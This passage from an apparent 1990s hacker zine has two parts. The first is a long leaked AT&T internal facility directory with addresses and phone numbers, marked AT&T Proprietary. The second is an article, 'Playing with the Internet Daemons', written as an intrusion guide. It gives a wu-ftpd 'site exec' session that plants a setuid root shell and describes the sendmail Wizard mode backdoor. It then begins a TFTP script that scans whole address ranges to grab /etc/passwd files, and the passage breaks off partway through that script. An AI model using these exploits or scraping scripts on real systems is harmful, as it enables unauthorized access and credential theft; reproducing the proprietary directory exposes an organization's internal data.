UIS SHOWCASE 2600 WARRENVILLE RD. LISLE IL 60532 708-260-7900
|
|||
|
NWSW CTR. 2600 WARRENVILLE RD. LISLE IL 60532 708-510-4000
|
|||
|
NWSW CTR. CORPORATE LAKES 2500 CABOT DRIVE LISLE IL 60532 708-510-4000
|
|||
|
LISLE PS 850 WARRENVILLE RD. LISLE IL 60532 708-719-1005
|
|||
|
AT&T LISLE CTR 4513 WESTERN AVE. LISLE IL 60532 708-810-6000
|
|||
|
CEO-WEST 1195 SUMMER HILL DRIVE LISLE IL 60532 708-971-5000
|
|||
|
MONTGOMERY WORKS 800 S. RIVER ST. MONTGOMERY IL 60538 708-859-4000
|
|||
|
WARRENVILLE 28W. 615 FERRY RD. WARRENVILE IL 60555 708-393-8000
|
|||
|
INDIAN HILL COURT 1000 E. WARRENVILLE RD. NAPERVILLE IL 60566 708-305-3000
|
|||
|
IH PARK-BL 200 PARK PLAZA NAPERVILLE IL 60567 708-979-2000
|
|||
|
AT&T ONE S. WACKER DRIVE CHICAGO IL 60606 708-592-6558
|
|||
|
AT&T 11595 N. MERIDIAN ST. CARMEL IN 46032 317-844-6674
|
|||
|
INDIANAPOLIS INST.8700ROBERTS DR SUITE 100 FISCHERS IN 46038 317-578-0160
|
|||
|
INDIANA AMO N. 151 N.DELAWARE ST. SUITE565 INDIANAPOL IN 46204 317-632-9161
|
|||
|
INDIANAPOLIS SVC (CIC) 2855 N. FRANKLIN RD. INDIANAPOL IN 46219 317-352-0011
|
|||
|
INDIANAPOLIS HERITAGE PK 6612 E. 75TH ST. INDIANAPOL IN 46250 317-845-8980
|
|||
|
AT&T 404 COLUMBIA PLACE-SUITE 210 SOUTH BEND IN 46601 219-232-2000
|
|||
|
KANSAS CITY SVC CNTR. 9501 W. 67TH ST. MERRIAM KS 66203 913-677-6000
|
|||
|
AT&T 5401 COLLEGE BLVD. LEAWOOD KS 66211 913-491-9840
|
|||
|
AT&T 200 NO. BROADWAY, SUITE 400 WICHITA KS 67202 316-269-7500
|
|||
|
AT&T 9300 SHELBYVILLE RD LOUISVILLE KY 40222 502-429-1000
|
|||
|
AT&T 3500 N. CAUSEWAY BLVD. 10th FLOOR METAIRIE LA 70002 504-832-4300
|
|||
|
AT&T 4354 S. SHERWOOD FOREST BLVD. BATONROUGE LA 70816 504-922-6600
|
|||
|
AT&T 3010 KNIGHT ST., SUITE 190 SHREVEPORT LA 71105 318-869-2041
|
|||
|
SHREVEPORT WORKS 9595 MANSFIELD RD. SHREVEPORT LA 71108 318-459-6000
|
|||
|
AT&T 365 CADWELL DR. RM 168 SPRINGFLD MA 01104 413-785-4400
|
|||
|
AT&T MICROELECT. 111 SPEEN ST. FRAMINGHAM MA 01701 508-626-2161
|
|||
|
ANDOVER 20 SHATTUCK RD. ANDOVER MA 01810 508-691-3000
|
|||
|
AT&T-WARD HILL 75 FOUNDATION AVE. WARD HILL MA 01835 508-374-5600
|
|||
|
MERRIMACK VALLEY 1600 OSGOOD ST. N.ANDOVER MA 01845 508-960-2000
|
|||
|
AT&T ACCT MGMT 800 BOYLESTON ST. BOSTON MA 02110 617-437-8800
|
|||
|
AT&T-BL 800 BOYLESTON ST. BOSTON MA 02110 617-437-8870
|
|||
|
AT&T NAT'L ACCTS 100 SUMMER ST. BOSTON MA 02110 617-574-6000
|
|||
|
NEW ENGLAND SVC 705 MT. AUBURN ST. WATERTOWN MA 02172 617-923-0765
|
|||
|
AT&T 430 BEDFORD ST. LEXINGTON MA 02173 617-863-9000
|
|||
|
BETHESDA AMO 6410 ROCKLEDGE DR. BETHESDA MD 20817 301-493-2000
|
|||
|
AT&T FED SYS 1100 WAYNE AVE SLVR SPGS MD 20910 301-495-7400
|
|||
|
COCKEYSVILLE N.S. SALES 225 SCHILLING CRCL. COCKEYVLLE MD 21030 301-584-1234
|
|||
|
FEDERAL SYS. MD 9160 GUILFORD RD COLUMBIA MD 21045 301-369-7700
|
|||
|
COULUMBIA MD 9305D GERWIG LN. COLUMBIA MD 21046 301-381-6150
|
|||
|
AT&T 400 EAST PRATT ST. BALTIMORE MD 21202 301-576-5700
|
|||
|
TRANSPACIFIC COMM.,INC.1001 MCCOMAS ST. BALTIMORE MD 21230 301-385-0425
|
|||
|
AT&T 136 COMMERCIAL ST., FLR 2 PORTLAND ME 04101 207-761-1400
|
|||
|
AT&T 26957 NORTHWESTERN HWY. SOUTHFIELD MI 48034 313-353-6210
|
|||
|
AT&T-NS 27777 FRANKLIN RD., SUITE 500 SOUTHFIELD MI 48034 313-355-7200
|
|||
|
NILES MMC 2121 W. CHICAGO RD. NILES MI 49120 616-684-6400
|
|||
|
AT&T 2861 CHARLEROIX, S.E. GRAND RPDS MI 49546 616-957-8200
|
|||
|
AT&T 4480 W. ROUNDLAKE RD. ARDEN HLLS MN 55112 612-633-4803
|
|||
|
MINNEAPOLIS SC 2230 COUNTY RD. H2 MOUNDSVIEW MN 55112 612-780-7750
|
|||
|
AT&T 420 THIRD AVE. S., RM 670 MINEAPOLIS MN 55415 612-626-9300
|
|||
|
AT&T MICROELECT. SALES W 82ND ST BLOOMINGTN MN 55431 612-885-4600
|
|||
|
BALLWIN 1111 WOODS MILL RD. BALLWIN MO 63011 314-891-2000
|
|||
|
ST.LOUIS-NS 701 MARKET ST. SUITE 900 ST. LOUIS MO 63101 314-891-5000
|
|||
|
AT&T 400 S. WOODS MILL RD. CHSTRFLD MO 63107 314-275-1400
|
|||
|
AT&T 424 S. WOODS MILL RD. CHSTRFLD MO 63107 314-469-2500
|
|||
|
KANSAS CITY WORKS 777 N. BLUE PKWY LEESSUMMIT MO 64063 816-251-4000
|
|||
|
KANSAS CITY AMO 1100 WALNUT ST. KANSASCITY MO 64141 816-654-4000
|
|||
|
NC WORKS 3300 LEXINGTON RD. S.E. WIN-SALEM NC 27102 919-784-1110
|
|||
|
REYNOLDA RD. (DDO) 2400 REYNOLDA RD. WIN-SALEM NC 27106 919-727-3100
|
|||
|
BURLINGOTN NC 204 GRAHAM-HOPEDALE RD. BURLINGTON NC 27215 919-228-3000
|
|||
|
GUILFORD CTR. I-85 MT HOPE CHURCH RD. MCLEANSVLE NC 27301 919-279-7000
|
|||
|
NS 1701 PINECROFT RD. GREENSBORO NC 27407 919-855-2775
|
|||
|
AT&T 7031 ALBERT PICK RD., SUITE 300 GREENSBORO NC 27409 919-668-1800
|
|||
|
AT&T ENGR. 3330 W. FRIENDLY AVE. GREENSBORO NC 27410 919-379-5301
|
|||
|
AT&T MICROELECT. SALES 5400 GLENWOOD RD. RALEIGH NC 27612 919-881-8023
|
|||
|
AT&T 6701-A NORTHPARK BLVD. CHARLOTTE NC 28216 704-597-3050
|
|||
|
AT&T 2 CENTRAL PARK PLAZA OMAHA NE 68102 402-595-5001
|
|||
|
OMAHA AMO 222 S. 15th.ST, SUITE 200 S. OMAHA NE 68124 402-595-5001
|
|||
|
OMAHA WORKS 120 & 1 ST OMAHA NE 68137 402-691-3000
|
|||
|
AT&T 10843 OLD MILL RD OMAHA NE 68154 402-334-6000
|
|||
|
AT&T 4 BEDFORD FARMS BEDFORD NH 03102 603-623-6100
|
|||
|
SIMPLEX WIRE (TYCO LABS) 2073 WOODBURY AVE. NEWINGTON NH 03801 603-436-6100
|
|||
|
PARSIPPANY 260 CHERRY HILL RD. PARSIPPANY NJ 07054 201-299-3000
|
|||
|
PARSIPPANY 4 WOOD HOLLOW RD. PARSIPPANY NJ 07054 201-428-7700
|
|||
|
PARSIPPANY CP 5 WOOD HOLLOW RD. PARSIPPANY NJ 07054 201-581-3000
|
|||
|
AT&T 99 JEFFERSON RD. WOODHOLLOW III PARSIPPANY NJ 07054 201-581-5600
|
|||
|
AT&T 4 CAMPUS DRIVE PARSIPPANY NJ 07054 201-829-1000
|
|||
|
AT&T 700 LANIDEX PLAZA PARSIPPANY NJ 07054 201-884-7000
|
|||
|
AT&T 1515 RTE 10 PARSIPPANY NJ 07054 201-993-4200
|
|||
|
LIBERTY CORNER 184 LIBERTY CORNER RD WARREN NJ 07060 201-580-4000
|
|||
|
AT&T-BL WARREN SRVC. CTR. 5 REINMAN RD. WARREN NJ 07060 201-756-1527
|
|||
|
CLARK SHOPS 100 TERMINAL AVE. CLARK NJ 07066 201-396-4000
|
|||
|
SHORT HILLS BELL LABS 101 JFK PKWY SHORTHILLS NJ 07078 201-564-2000
|
|||
|
AT&T 5000 HADLEY RD SO.PLNFLD NJ 07080 201-668-3200
|
|||
|
QUALITY MGMT ENGIN. 650 LIBERTY AVE. UNION NJ 07083 201-851-3333
|
|||
|
AT&T 1480 ROUTE 9 N. WOODBRIDGE NJ 07095 201-750-3100
|
|||
|
TWO GATEWAY CTR. NEWARK NJ 07102 201-468-6000
|
|||
|
FREEHOLD AT&T JUNIPER PLAZA RT.9 FREEHOLD NJ 07728 201-577-5000
|
|||
|
AT&T-BL CRAWFORD HILL KEYPORT RD. HOLMDEL NJ 07733 201-888-7000
|
|||
|
AT&T-BL CRAWFORDS CORNER RD HOLDMEL NJ 07733 201-957-2000
|
|||
|
AT&T 307 MIDDLETOWN-LINCROFT RD. LINCROFT NJ 07738 201-576-4000
|
|||
|
RED HILL-BL 480 RED HILL RD MIDDLETOWN NJ 07748 201-949-3000
|
|||
|
AT&T 200 LAUREL AVE MIDDLETOWN NJ 07748 201-957-2000
|
|||
|
W. LONG BRANCH 185 MONMOUTH PKWY W.LG.BRNCH NJ 07764 201-870-7000
|
|||
|
SUMMIT 190 RIVER RD. SUMMIT NJ 07901 201-522-6555
|
|||
|
AT&T 233 MT. AIRY RD BSK RDGE NJ 07920 201-204-4000
|
|||
|
AT&T 188 MT. AIRY RD BSK RDGE NJ 07920 201-221-2000
|
|||
|
BASKING RIDGE 295 NO. MAPLE AVE. BSK RDGE NJ 07920 201-221-2000
|
|||
|
AT&T 131 MORRISTOWN RD BSK RDGE NJ 07920 201-953-3900
|
|||
|
AT&T RMC 222 MT. AIRY RD BSK RDGE NJ 07920 201-953-5300
|
|||
|
AT&T INTNAT'L MT. KEMBLE AVE BSK RDGE NJ 07920 201-953-7000
|
|||
|
AT&T-COMM. TR. 202-206N. BEDMINSTER NJ 07921 201-234-4000
|
|||
|
BERKELEY HEIGHTS 1 OAK WAY BRKLY HGTS NJ 07922 201-771-2000
|
|||
|
BERKELEY HEIGHTS 2 OAK WAY BRKLY HGTS NJ 07922 201-771-2000
|
|||
|
BERNARDSVILLE 4 ESSEX AVE BERNARDSVL NJ 07924 201-204-2701
|
|||
|
AT&T-BL NORTH RD CHESTER NJ 07930 201-879-3400
|
|||
|
MT. KEMBLE PLAZA 340 RTE. 202 S. MORRISTOWN NJ 07960 201-326-2000
|
|||
|
AT&T CAPITAL CORP. 44 WHIPPANY RD. MORRISTOWN NJ 07960 201-397-3000
|
|||
|
MORRISTOWN AMO 111 MADISON AVE. MORRISTOWN NJ 07960 201-631-3700
|
|||
|
AT&T 412 MOUNT KEMBLE AVE. MORRISTOWN NJ 07960 201-644-6000
|
|||
|
AT&T 60 COLUMBIA TRNPK MORRISTOWN NJ 07960 201-829-7200
|
|||
|
MORRIS BELL LABS 25 LINDSLEY DR. MORRISTOWN NJ 07960 201-898-1000
|
|||
|
AT&T 1 SPEEDWELL AVE. MORRISTOWN NJ 07960 201-898-2000
|
|||
|
AT&T 1776 ON THE GREEN MORRISTOWN NJ 07960 201-898-6000
|
|||
|
AT&T 100 SOUTHGATE PARKWAY MORRISTOWN NJ 07960 201-898-8000
|
|||
|
SOUTH GATE 475 SOUTH ST. MORRISTOWN NJ 07962 201-606-2000
|
|||
|
MURRAY HILL 600 MOUNTAIN AVE. MURRAYHILL NJ 07974 201-582-3000
|
|||
|
AT&T-T 40 MOUNTAIN AVE. MURRAYHILL NJ 07974 201-665-7000
|
|||
|
WHIPPANY BELL LABS WHIPPANY RD WHIPPANY NJ 07981 201-386-3000
|
|||
|
PENNSAUKEN SUP. 1077 THOM. BUSH MEM. HWY PENNSAUKEN NJ 08110 609-488-9020
|
|||
|
HOPEWELL-ERC CARTER RD. HPWL TNSHP NJ 08525 609-639-1234
|
|||
|
HOPEWELL-CEC CARTER RD. HPWL TNSHP NJ 08525 609-639-4500
|
|||
|
AT&T 29-C EMMONS DRIVE PRINCETON NJ 08540 609-987-3000
|
|||
|
LAWRENCEVILLE-CEC 3131 PRINCETON OFC PK LRNCVLLE NJ 08648 609-896-4000
|
|||
|
AT&T COMM (IMS) 1300 WHITE HOUSE TRENTON NJ 08690 609-581-1000
|
|||
|
AT&T 745 RT 202/206N BRIDGEWATR NJ 08807 201-231-6000
|
|||
|
AT&T 95 CORPORATE DR. BRIDGEWATR NJ 08807 201-658-5000
|
|||
|
AT&T MARKTG CTR 55 CORPORATE DR. BRIDGEWATR NJ 08807 201-658-6000
|
|||
|
AT&T 485 U.S. ROUTE 1 S., PKWY TOWERS ISELIN NJ 08830 201-855-8000
|
|||
|
AT&T 80 NORTHFIELD AVE. EDISON NJ 08837 201-225-8700
|
|||
|
AT&T 20 KNIGHTSBRIDGE RD PISCATAWAY NJ 08854 201-457-1028
|
|||
|
AT&T 30 KNIGHTSBRIDGE RD PISCATAWAY NJ 08854 201-457-2000
|
|||
|
AT&T 180 CENTENNIAL AVE. PISCATAWAY NJ 08854 201-457-6000
|
|||
|
AT&T CORP ED. 140 CENTENNIAL AVE. PISCATAWAY NJ 08854 201-457-7000
|
|||
|
AT&T 371 HOES LN. PISCATAWAY NJ 08854 201-463-2200
|
|||
|
AT&T 242 OLD NEW BRUNSWICK RD PISCATAWAY NJ 08854 201-562-6900
|
|||
|
AT&T 100 ATRIUM WAY SOMERSET NJ 08873 201-560-1300
|
|||
|
AT&T PIXEL MACHINES 1 EXEC.DR. SOMERSET NJ 08873 201-563-2200
|
|||
|
HOLMDEL-BL CRAWFORDS CORNER RD HOLMDEL NJ 07733 201-949-3000
|
|||
|
AT&T 1001 MENAUL BLVD. N.E. B345 ALBUQURQUE NM 87107 505-761-6300
|
|||
|
SANDIA NAT'L LABS 1515 EUBANK BLVD. S.E. ALBUQURQUE NM 87123 505-844-5678
|
|||
|
AT&T 220 EDISON WAY RENO NV 89502 702-239-7015
|
|||
|
AT&T ENVIRON SAFETY 32 AVE. OF AMERICAS NEW YORK NY 10013 212-219-6396
|
|||
|
AT&T-NYC 22 CORTLANDT ST. NEW YORK NY 10017 212-393-9800
|
|||
|
550 MADISON AVE. NEW YORK NY 10022 212-605-5500
|
|||
|
NS ONE PENN PLAZA SUITE 5420 NEW YORK NY 10119 212-714-5900
|
|||
|
AT&T 2 MANHATTANVILLE RD. PURCHASE NY 10577 914-251-0700
|
|||
|
SUFFERN MMC 22 HEMION RD. SUFFERN NY 10901 914-577-6600
|
|||
|
AT&T 520 BROAD HOLLOW RD. MELVILLE NY 11747 516-420-3000
|
|||
|
ALBANY 11 26 AVIATION RD. ALBANY NY 12205 518-489-4615
|
|||
|
AT&T 16 CORPORATE WOODS BLVD. ALBANY NY 12211 518-447-6900
|
|||
|
AT&T 2 JEFFERSON PLAZA, FLR 2 POUGHKEPSE NY 12601 914-485-7744
|
|||
|
AT&T MARKETING 6597 KINNE RD SYRACUSE NY 13214 315-445-3800
|
|||
|
AT&T 300 PEARL ST. OLYMPIA TOWERS BUFFALO NY 14202 716-849-6000
|
|||
|
BUFFALO INSTALL. 25 JOHN GLENN DR. AMHERST NY 14228 716-691-2711
|
|||
|
AT&T 1 MARINE MIDLAND PLZ. ROCHESTER NY 14604 716-777-4400
|
|||
|
CET 5151 BLAZER MEM. PKWY DUBLIN OH 43017 614-764-5454
|
|||
|
COLUMBUS WORKS 6200 E. BROAD ST. COLUMBUS OH 43213 614-860-2000
|
|||
|
AT&T ONE SEAGATE, SUITE 750 TOLEDO OH 43604 419-245-3700
|
|||
|
AT&T-NS 55 ERIEVIEW PLAZA 4TH FL. CLEVELAND OH 44114 216-664-6500
|
|||
|
ADP 7007 E. PLEASANT VALLEY INDEPNDNCE OH 44131 216-447-1980
|
|||
|
NAT'L ACCOUNT 1 FIRST NAT'L PLAZA DAYTON OH 44502 513-449-7800
|
|||
|
AT&T 7725 W. RENO AVE. OK. CITY OK 73126 405-491-3000
|
|||
|
AT&T LGE BUS. MACHINES 2020 S.W. 4TH AVE. PORTLAND OR 97201 503-295-5000
|
|||
|
AT&T MICROELECT 1220 SW GREENBURGH RD PORTLAND OR 97223 503-244-3883
|
|||
|
AT&T COMMERCE CT. 4 STATION SQ. SUITE 770 PITTSBURGH PA 15219 412-338-4800
|
|||
|
AT&T 4 GATEWAY CTR. SUITE 500 PITTSBURGH PA 15222 412-392-8200
|
|||
|
AT&T 470 STREETS RUN RD. PITTSBURGH PA 15236 412-882-1845
|
|||
|
HARRISBURG 2080 LINGLESTOWN RD. HARRISBURG PA 17110 717-540-7251
|
|||
|
ALLENTOWN-BETHLEHEM 2255 AVE. A BETHLEHEM PA 18018 215-861-2700
|
|||
|
AT&T-BL STC RT 222 BREINIGSVL PA 18103 215-391-2000
|
|||
|
AT&T MICROELECT. 961 MARCON BLVD. ALLENTOWN PA 18103 215-266-2900
|
|||
|
ALLENTOWN-BL 1247 SO. CEDAR CREST BLVD. ALLENTOWN PA 18103 215-770-2200
|
|||
|
AT&T 1 IMPERIAL WAY 2ND FL. ALLENTOWN PA 18195 215-398-5800
|
|||
|
AT&T 3 BALA PLAZA WEST BLDG. BALA CYNWD PA 19004 215-581-2400
|
|||
|
AT&T 514 KAISER DR. FOLCROFT PA 19032 215-724-5250
|
|||
|
AT&T 1800 JFK BLVD., SUITE 1300 PHILADELPH PA 19103 215-972-1300
|
|||
|
KING OF PRUSSIA 601 ALLENDALE RD. KING OF PR PA 19406 215-768-2600
|
|||
|
READING WORKS 2525 N. 12TH ST. READING PA 19604 215-939-7011
|
|||
|
AT&T NASSAU RECYCLE 4201 W. COLUMBIA CASEY SC 29033 803-796-4720
|
|||
|
AT&T 1201 MAIN ST. 22ND FL. COLUMBIA SC 29201 803-733-3800
|
|||
|
AT&T 111 WESTWOOD PL. 3RD FL. BRENTWOOD TN 37027 615-377-4000
|
|||
|
AT&T MICROELECT. 195 POLK AVE. NASHVILLE TN 37211 615-749-8222
|
|||
|
AT&T REPAIR CTR 653 MAINSTREAM DR. NASHVILLE TN 37228 615-242-1950
|
|||
|
NASHVILLE MSL 566 MAINSTREAM DR. NASHVILLE TN 37228 615-256-4111
|
|||
|
AT&T 9041 EXECUTIVE PARK KNOXVILLE TN 37923 615-690-3400
|
|||
|
AT&T-NS SALES 909 E.LAS COLINAS BLVD IRVING TX 75039 214-401-4700
|
|||
|
DALLAS WORKS 3000 SKYLINE DRIVE MESQUITE TX 75149 214-284-2000
|
|||
|
AT&T-NS 1201 MAIN ST. SUITE 2555 DALLAS TX 75202 214-745-4790
|
|||
|
AT&T 5525 LBJ FREEWAY DALLAS TX 75240 214-308-2000
|
|||
|
AT&T 2501 PARKVIEW DR., SUITE 200 FT.WORTH TX 76102 817-870-4400
|
|||
|
AT&T-NS 2900 N. LOOP WEST HOUSTON TX 77092 713-956-4400
|
|||
|
AT&T CITYVIEW 10999 IH 10 W SAN ANTON TX 78230 512-691-5700
|
|||
|
AT&T 5444 S. STAPLES CORPUS CHR TX 78411 512-994-4400
|
|||
|
AT&T 8911 CAP. OF TEX HGHWY AUSTIN TX 78759 512-343-3000
|
|||
|
AT&T 415 WEST 8TH ST. SUITE 307 AMARILLO TX 79101 806-374-9435
|
|||
|
AT&T-BMG 3000 N. GARFIELD SUITE 180 MIDLAND TX 79705 915-687-8700
|
|||
|
AT&T-NS 10521 ROSEHAVEN ST. FAIRFAX VA 22030 703-352-0900
|
|||
|
AT&T-NS 12450 FAIR LAKES CIRCLE FAIRFAX VA 22033 703-631-3288
|
|||
|
AT&T-BELL LABS 1201 S. HAYES ST. ARLINGTON VA 22202 703-769-8900
|
|||
|
AT&T 1550 WILSON BLVD. ARLINGTON VA 22209 703-247-4690
|
|||
|
AT&T FED SYS 1201 S. HAYES ST. ARLINGTON VA 22209 703-685-8678
|
|||
|
AT&T MAJOR MKT & SALES 600 EAST BROAD ST. RICHMOND VA 23219 804-775-3300
|
|||
|
AT&T OSO 1530 E. RUN RD. RICHMOND VA 23228 804-262-4062
|
|||
|
RICHMOND WORKS 4500 S. LABURNUM AVE. RICHMOND VA 23231 804-226-5000
|
|||
|
AT&T 1338 PLANTATION RD NE ROANOKE VA 24012 703-344-1160
|
|||
|
NEW RIVER VALLEY CALLER 21 RADFORD VA 24143 703-731-8000
|
|||
|
AT&T 2901 THIRD AVE. SEATTLE WA 98121 206-443-7000
|
|||
|
AT&T ACCT MGMT 2121 4TH AVE. SEATTLE WA 98121 206-728-4749
|
|||
|
AT&T N. 9 POST SUITE 330 SPOKANE WA 99201 509-747-6110
|
|||
|
AT&T 400 S. EXECUTIVE DR. BROOMFIELD WI 53005 414-785-9110
|
|||
|
MILWAUKEE CP/ASSEM.CTR MILWAUKEE WI 53212 414-963-8200
|
|||
|
AT&T 2802 INTERNAT'L LN, 2ND FLR MADISON WI 53704 608-241-8900
|
|||
|
AT&T 900 PENNSYLVANIA AVE. CHARLESTON WV 25302 304-347-2000
|
|||
|
MARTINSBURG MMC TABLER STA.RD. MARTINSBRG WV 25401 304-263-6931
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
And remember...
|
|||
|
|
|||
|
All directory information is classified AT&T Proprietary and, as such, should
|
|||
|
be safeguarded as outlined in GEI 2.2. Responsibility for security is passed
|
|||
|
on to each employee receiving the directory.
|
|||
|
|
|||
|
|
|||
|
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Playing with the Internet Daemons
|
|||
|
|
|||
|
by
|
|||
|
|
|||
|
Voyager [TNO]
|
|||
|
|
|||
|
|
|||
|
Internet hosts communicate with each other using either TCP
|
|||
|
(Transmission Control Protocol) or UDP (User Datagram Protocol) on top
|
|||
|
of IP (Internet Protocol). Other protocols are used on top of IP, but
|
|||
|
TCP and UDP are the ones that are of interest to us. On a Unix system,
|
|||
|
the file /etc/protocols will list the available protocols on your
|
|||
|
machine
|
|||
|
|
|||
|
On the Session Layer (OSI model) or the Internet Layer (DOD Protocol
|
|||
|
Model) data is moved between hosts by using ports. Each data
|
|||
|
communication will have a source port number and a destination port
|
|||
|
number. Port numbers can be divided into two types, well-known ports
|
|||
|
and dynamically allocated ports. Under Unix, well-known ports are
|
|||
|
defined in the file /etc/services. In addition, RFC (Request For
|
|||
|
Comments) 1700 "Assigned Numbers" provides a complete listing of all
|
|||
|
well-known ports. Dynamically allocated port numbers are assigned as
|
|||
|
needed by the system.
|
|||
|
|
|||
|
Unix provides the ability to connect programs called daemons to
|
|||
|
well-known ports. The remote computer will connect to the well-known
|
|||
|
port on the host computer, and be connected to the daemon program.
|
|||
|
|
|||
|
Daemon programs are traditionally started by inetd (The Internet
|
|||
|
Daemon). Daemon programs to be executed are defined in the inetd
|
|||
|
configuration file, /etc/inetd.conf.
|
|||
|
|
|||
|
Most of these daemons run as a priveledged user, often as root. Many of
|
|||
|
these programs have vulnerabilities which can be exploited to gain access
|
|||
|
to remote systems.
|
|||
|
|
|||
|
The daemons we are interested in are:
|
|||
|
|
|||
|
Service Port Number Description
|
|||
|
~~~~~~~~~~~~~ ~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
ftp 21 File Transfer [Control]
|
|||
|
smtp 25 Simple Mail Transfer Protocol
|
|||
|
tftp 69 Trivial File Transfer Protocol
|
|||
|
finger 79 Finger
|
|||
|
www-http 80 World Wide Web HTTP
|
|||
|
sunrpc 111 SUN Remote Procedure Call
|
|||
|
fln-spx 221 Berkeley rlogind with SPX auth
|
|||
|
rsh-spx 222 Berkeley rshd with SPX auth
|
|||
|
netinfo 716-719 NetInfo
|
|||
|
ibm-res 1405 IBM Remote Execution Starter
|
|||
|
nfs 2049 Network File System
|
|||
|
x11 6000-6063 X Window System
|
|||
|
|
|||
|
rcp/rshd Remote Copy/Remote Shell Daemon
|
|||
|
nis Network Information Services
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
The next part of this article will focus on specific daemons and their
|
|||
|
known vulnerabilities. The vulnerabilities with brief explanations will be
|
|||
|
explained here. For the more complicated exploits, which are beyond the
|
|||
|
scope of a concise article, more research will be required on the part of
|
|||
|
the reader.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
--> ftp 21 File Transfer [Control]
|
|||
|
|
|||
|
FTP is the File Transfer Protocol. FTP requests are answered by the FTP
|
|||
|
daemon, ftpd. wuarchive's ftpd versions below 2.2 have a vulnerability
|
|||
|
where you can execute any binary you can see with the 'site exec'
|
|||
|
command by calling it with a relative pathname with "../" at the
|
|||
|
beginning. Here is a sample exploit:
|
|||
|
|
|||
|
Login to the system via ftp:
|
|||
|
|
|||
|
220 uswest.com FTP server (Version wu-2.1(1) ready.
|
|||
|
Name (uswest.com:waltman): waltman
|
|||
|
331 Password required for waltman.
|
|||
|
Password: jim
|
|||
|
230 User waltman logged in.
|
|||
|
Remote system type is UNIX.
|
|||
|
Using binary mode to transfer files.
|
|||
|
ftp> quote "site exec cp /bin/sh /tmp/.tno"
|
|||
|
200-cp /bin/sh /tmp/tno
|
|||
|
ftp> quote "site exec chmod 6755 /tmp/.tno"
|
|||
|
200-chmod 6755 /tmp/tno
|
|||
|
ftp> quit
|
|||
|
221 Goodbye.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
--> smtp 25 Simple Mail Transfer Protocol
|
|||
|
|
|||
|
Mail attacks are one of the oldest known methods of attacking Internet
|
|||
|
hosts. The most common mail daemon, and least secure, is sendmail. Other
|
|||
|
mail daemons include smail, MMDF,and IDA sendmail. Sendmail has had too
|
|||
|
many vulnerabilities to list them all. There is an entire FAQ written
|
|||
|
specifically on sendmail vulnerabilities, therefore we will not cover them
|
|||
|
heavily here.
|
|||
|
|
|||
|
One well known vulnerability, useful only for historical purposes, is
|
|||
|
"Wizard Mode." In Wizard mode you could request a shell via Port 25
|
|||
|
(The SMTP port). No modern system will be vulnerable to this attack. To
|
|||
|
exploit this vulnerability, you telnetted to port 25, typed WIZ to enter
|
|||
|
Wizard mode, and entered the password. The problem related to the way
|
|||
|
the encrypted password was stored. There was a bug that caused the
|
|||
|
system to believe that no password was as good as the real password.
|
|||
|
|
|||
|
To quote Steven Bellovin:
|
|||
|
|
|||
|
The intended behavior of wizard mode was that if you supplied
|
|||
|
the right password, some other non-standard SMTP commands were
|
|||
|
enabled, notably one to give you a shell. The hashed password
|
|||
|
-- one-way encrypted exactly as per /etc/passwd -- was stored in
|
|||
|
the sendmail configuration file. But there was this bug; to
|
|||
|
explain it, I need to discuss some arcana relating to sendmail
|
|||
|
and the C compiler.
|
|||
|
|
|||
|
In order to save the expense of reading and parsing the
|
|||
|
configuration file each time, sendmail has what's known as a
|
|||
|
``frozen configuration file''. The concept is fine; the
|
|||
|
implementation isn't. To freeze the configuration file,
|
|||
|
sendmail just wrote out to disk the entire dynamic memory area
|
|||
|
(used by malloc) and the `bss' area -- the area that took up no
|
|||
|
space in the executable file, but was initialized to all zeros
|
|||
|
by the UNIX kernel when the program was executed. The bss area
|
|||
|
held all variables that were not given explicit initial values
|
|||
|
by the C source. Naturally, when delivering mail, sendmail just
|
|||
|
read these whole chunks back in, in two giant reads. It was
|
|||
|
therefore necessary to store all configuration file information
|
|||
|
in the bss or malloc areas, which demanded a fair amount of care
|
|||
|
in coding.
|
|||
|
|
|||
|
The wizard mode password was stored in malloc'ed memory, so it
|
|||
|
was frozen properly. But the pointer to it was explicitly set
|
|||
|
to NULL in the source:
|
|||
|
|
|||
|
char *wiz = NULL;
|
|||
|
|
|||
|
That meant that it was in the initialized data area, *not* the
|
|||
|
bss. And it was therefore *not* saved with the frozen
|
|||
|
configuration. So -- when the configuration file is parsed and
|
|||
|
frozen, the password is read, and written out. The next time
|
|||
|
sendmail is run, though, the pointer will be reset to NULL.
|
|||
|
(The password is present, of course, but there's no way to find
|
|||
|
it.) And the code stupidly believed in the concept of no
|
|||
|
password for the back door.
|
|||
|
|
|||
|
One more point is worth noting -- during testing, sendmail did
|
|||
|
the right thing with wizard mode. That is, it did check the
|
|||
|
password -- because if you didn't happen to do the wizard mode
|
|||
|
test with a frozen configuration file -- and most testing would
|
|||
|
not be done that way, since you have to refreeze after each
|
|||
|
compilation -- the pointer would be correct.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
--> tftp 69 Trivial File Transfer Protocol
|
|||
|
|
|||
|
tftp is the Trivial File Transfer Protocol. tftp is most often used to
|
|||
|
attempt to grab password files from remote systems. tftp attacks are so
|
|||
|
simple and repetitive that scripts are written to automate the process
|
|||
|
of attacking entire domains. Here is one such script:
|
|||
|
|
|||
|
#!/bin/sh
|
|||
|
########################################################################
|
|||
|
# TFTP snagger by Yo
|
|||
|
# It snags /etc/passwd files from all hosts with open 69 (tftp) port.
|
|||
|
# scans all hosts from XX.XX.0.0 - XX.XX.255.255
|
|||
|
# you can run it in the background in following way:
|
|||
|
# snag [hostname] > /dev/null &
|
|||
|
# [hostname] might be used IP # (with -ip option) as well as FQDN
|
|||
|
# Last Updated 10/20/92
|
|||
|
#
|
|||
|
# Highly modified by ThePublic on 10/21/92
|
|||
|
########################################################################
|
|||
|
case $1 in
|
|||
|
'')
|
|||
|
echo " Usage: $0 [hostname] to run in the foreground "
|
|||
|
echo " $0 [hostname] > /dev/null & to run in the background "
|
|||
|
